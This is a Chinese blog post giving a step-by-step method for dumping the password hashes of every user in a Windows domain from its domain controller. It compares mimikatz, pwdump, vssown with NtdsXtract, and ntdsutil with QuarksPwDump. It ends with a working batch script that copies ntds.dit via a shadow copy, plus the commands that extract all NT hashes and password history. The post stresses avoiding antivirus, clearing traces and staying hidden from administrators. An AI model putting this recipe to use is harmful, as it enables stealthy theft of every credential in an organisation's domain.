0x00目标:

导出当前域内所有用户的hash

0x01测试环境:

域控:server2008 r2

杀毒软件:已安装*

域控权限:可使用net use远程登陆,不使用3389

0x02测试方法:

(1)mimikatz:

hash数量:只能抓取登陆过的用户hash,无法抓取所有用户

免杀:需要免杀

(2)pwdump:

hash数量:无法抓取所有用户

免杀:需要免杀

(3)vssown.vbs + libesedb + NtdsXtract

hash数量:所有用户

免杀:不需要

优点:

获得信息很全面,可获得以下信息:

Record ID

User name

User principal name

SAM Account name

SAM Account type

GUID

SID

When created

When changed

Account expires

Password last set

Last logon

Last logon timestamp

Bad password time

Logon count

Bad password count

User Account Control

Ancestors

Password hashes

Password history

Supplemental credentials

Member of

缺点:

vssown.vbs使用后需要删除快照清理痕迹

vssown.vbs偶尔会报错

数据库巨大,下载回本地很麻烦

libesedb + NtdsXtract环境搭建麻烦,目前网上中文的教程存在一些错误,下载链接也已失效,需要自行摸索

用vssown.vbs复制出来的ntds.dit数据库无法使用QuarksPwDump.exe读取

Tips:
libesedb + NtdsXtract环境搭建的一点提示:

(download libesedb)

https://github.com/libyal/libesedb/releases/download/20150409/libesedb-experimental-20150409.tar.gz

tar zxvf libesedb-experimental-20150409.tar.gz

cd libesedb-20150409

./configure

make

cd esedbtools/

./esedbexport

(copy ntds.dit to ~/libesedb-20150409/esedbtools)

./esedbexport ./ntds.dit

(wait...)

mv ntds.dit.export/ ../../

(download ntdsxtract)

http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

unzip ntdsxtract_v1_0.zip

cd NTDSXtract 1.0/

(move SYSTEM to '/root/SYSTEM')

(get passwordhashes )

python dsusers.py ../ntds.dit.export/datatable.3 ../ntds.dit.export/link_table.5 --passwordhashes '/root/SYSTEM'

(4)ntdsutil.exe + QuarksPwDump.exe

hash数量:所有用户

免杀:QuarksPwDump.exe需要免杀

优点:

获得信息很全面 QuarksPwDump.exe可在windows下使用,读取hash值的操作简便快捷

缺点:

ntdsutil.exe使用后需要删除快照清理痕迹 ntdsutil.exe偶尔会报错
巨大的数据库,QuarksPwDump.exe读取偶尔会报错 server2003的shell下无法使用

0x03实际测试:

  • gethashes.exe:没有源码,忽略
  • mimikatz:无法抓出所有用户hash,本机管理员口令也无法导出
  • pwdump:抓取数量不足
  • vssown.vbs + libesedb + NtdsXtract:成功,耗时3天+
  • ntdsutil.exe + QuarksPwDump.exe:ntdsutil.exe报错,失败

    0x04分析:

    5种方法唯一成功的是vssown.vbs + libesedb + NtdsXtract,但是耗时太久,操作麻烦,下载数据库容易暴露,vssown.vbs备份的信息容易被管理员发现

    其他方法中可取的地方:vssown.vbs复制数据库的方法很是巧妙,但存在一些不足,配合域控的at命令执行较为麻烦;QuarksPwDump.exe可在windows下直接使用,免去读取数据库的等待,并且QuarksPwDump可获得源码,能够配合实际使用做修改。

    那么大胆设想一下:如果使用QuarksPwDump.exe在域控上直接读取ntds.dit岂不是最好

    0x05改进:

    (1)分析vssown.vbs的复制办法,找到一种更好的解决办法,改用ShadowCopy实现ntds.dit的复制
    (2)对QuarksPwDump的改造,实现命令行下的自动读取及导出信息

    Tips:

    ShadowCopy 是一款增强型的免费文件复制工具,由于使用了微软卷影副本(`Volume Shadow Copy`)技术,它能够复制被锁定的文件或者被其他程序打开的文件,

    因此只要是硬盘的上的文件,即使正被程序占用,`ShadowCopy` 都可以拷贝出来。

    0x06最终方案:

    (1)使用ShadowCopy的命令行版,编写bat实现拷贝ntds.dit至当前目录

    setlocal

    if NOT "%CALLBACK_SCRIPT%"=="" goto :IS_CALLBACK

    set SOURCE_DRIVE_LETTER=%SystemDrive%

    set SOURCE_RELATIVE_PATH=\windows\ntds\ntds.dit

    set DESTINATION_PATH=%~dp0

    @echo ...Determine the scripts to be executed/generated...

    set CALLBACK_SCRIPT=%~dpnx0

    set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd

    @echo ...Creating the shadow copy...

    "%~dp0vsshadow.exe" -script=%TEMP_GENERATED_SCRIPT% -exec="%CALLBACK_SCRIPT%" %SOURCE_DRIVE_LETTER%

    del /f %TEMP_GENERATED_SCRIPT%

    @goto :EOF

    :IS_CALLBACK

    setlocal

    @echo ...Obtaining the shadow copy device name...

    call %TEMP_GENERATED_SCRIPT%

    @echo ...Copying from the shadow copy to the destination path...

    copy "%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%" %DESTINATION_PATH%

    参考链接: http://blogs.msdn.com/b/adioltean/archive/2005/01/05/346793.aspx

    (2)使用QuarksPwDump直接读取信息并将结果导出至文件,先执行

    esentutl /p /o ntds.dit

    修复复制出来的数据库

    QuarksPwDump.exe -dhb -hist -nt ntds.dit -o log.txt

    读取并导出。

    注:实际使用时ntds.dit和log.txt需要加绝对路径

    Tips:

    QuarksPwDump.exe:Dump various types of Windows credentials without injecting in any process.

    源码下载链接,vs2010直接编译即可

    https://github.com/quarkslab/quarkspwdump

    0x07小结:

    ShadowCopy+QuarksPwDump:

    hash数量:所有用户

    免杀:不需要

    优点:

    获得信息全面

    bat一键搞定,简单高效

    无需下载ntds.dit,隐蔽性高

导出当前域内所有用户hash的技术整理的更多相关文章

  1. 6.Dump域内用户Hash姿势集合

    本文转自先知社区,原文链接:https://xz.aliyun.com/t/2527#toc-10 原文地址:https://pentestlab.blog/2018/07/04/dumping-do ...

  2. 内网技巧-通过SAM数据库获得本地用户hash的方法

    内网技巧-通过SAM数据库获得本地用户hash的方法 在windows上的C:\Windows\System32\config目录保存着当前用户的密码hash.我们可以使用相关手段获取该hash. 提 ...

  3. [内网渗透]HASH获取与HASH传递

    0x01 PTH简介 PTH,即Pass-The-Hash,首先我们来说下为什么要使用HASH传递,一是在目标机>=win server 2012时,lsass.exe进程中是抓不到明文密码的, ...

  4. (转)MS14-068域内提权漏洞总结

    0x01 漏洞起源 说到ms14-068,不得不说silver ticket,也就是银票.银票是一张tgs,也就是一张服务票据.服务票据是客户端直接发送给服务器,并请求服务资源的.如果服务器没有向域控 ...

  5. [提权]域内提权神器 MS14-068 完整EXP

     可以让任何域内用户提升为域管理员     c:\python27\python.exe ms14-068.py -u k8test3@k8.local -p k8team!@# -s S-1-5-2 ...

  6. MS16-072域内中间人攻击

    0x01 漏洞利用 在目标主机域用户口令已知的条件下,目标主机在进行策略更新时,对域服务器的认证存在漏洞,攻击者劫持认证服务器的过程,引导至伪造的域服务器,并在域服务器中制定用户的计划任务策略,可以获 ...

  7. 域内信息收集 powershell收集域内信息

    POwershell收集域内信息 Powershell(你可以看做CMD的升级版 但是和cmd完全不一样) 原来的powershe是不能执行任何脚本的 更改执行策略 这个是一个绕过的脚本 接下来我们了 ...

  8. AD域内DNS服务器如何解析公网域名

    原创地址:http://www.cnblogs.com/jfzhu/p/4022999.html 转载请注明出处 AD域内需要有DNS服务器,用于解析域内的计算机名,但是域内的计算如何解析公网的域名呢 ...

  9. mysql经纬度查询并且计算2KM范围内附近用户的sql查询性能优化实例教程

    之前很傻很天真地以为无非就是逐个计算距离,然后比较出来就行了,然后当碰到访问用户很多,而且数据库中经纬度信息很多的时候,计算量的迅速增长,能让服务器完全傻逼掉,还是老前辈的经验比我们丰富,给了我很大的 ...

随机推荐

  1. 【c++】字符串流输出恢复状态问题

    缘起 #include <iostream> #include <sstream> using namespace std; int main() { istringstrea ...

  2. 6.042 Mathematics for Computer Science

    课程信息 6.042 Mathematics for Computer Science

  3. JAVA练手--String

    package tet; public class kk { public static void main(String[] args) { //1. { String Stra = "1 ...

  4. Android四大组件--活动(Activity)

    1. 概念 说明: 1). 创建和销毁 onCreate 和 onDestory 应用场景:当界面销毁的时候存储一些数据,在onCreate创建的时候回显数据: 例如:发短信:写短信写到一半,按hom ...

  5. android应用执行需要root权限的shell命令

    导入jar包:http://blog.csdn.net/zhw1551706847/article/details/77709142 RootTools:http://blog.csdn.net/st ...

  6. webstorm软件小技巧

    1.使用tab可以方便的生成代码片段 调出setting,搜索live template 在javascrpt 模板线面点击"+" 添加一个模板 fun 模板内容如下 functi ...

  7. C# 条码生成类

    using System.Collections; using System.Text.RegularExpressions; namespace DotNet.Utilities { public ...

  8. [javaSE] 集合框架(迭代器)

    当我们创建一个集合以后,可以直接使用system.out.println()来打印这个集合,但是,我们需要可以对每个元素进行操作,所以,这里需要使用迭代器来遍历集合 迭代器其实就是集合取出元素的方式 ...

  9. 5 springboot 集成dubbo

    Apache Dubbo 是一款高性能Java RPC框架 由阿里巴巴开源并进入Apache孵化器,官网 http://dubbo.apache.org 提供服务化基础功能: 接口远程调用,智能负载均 ...

  10. 关于springmvc中常用的注解,自己也整理一下

    1.@Controller 在springMVC中@controller主要用在控制层的类上,之前只知道用注解开发的时候必须加一个@controller ,今天看了别的大佬整理的才知道为什么这么用,控 ...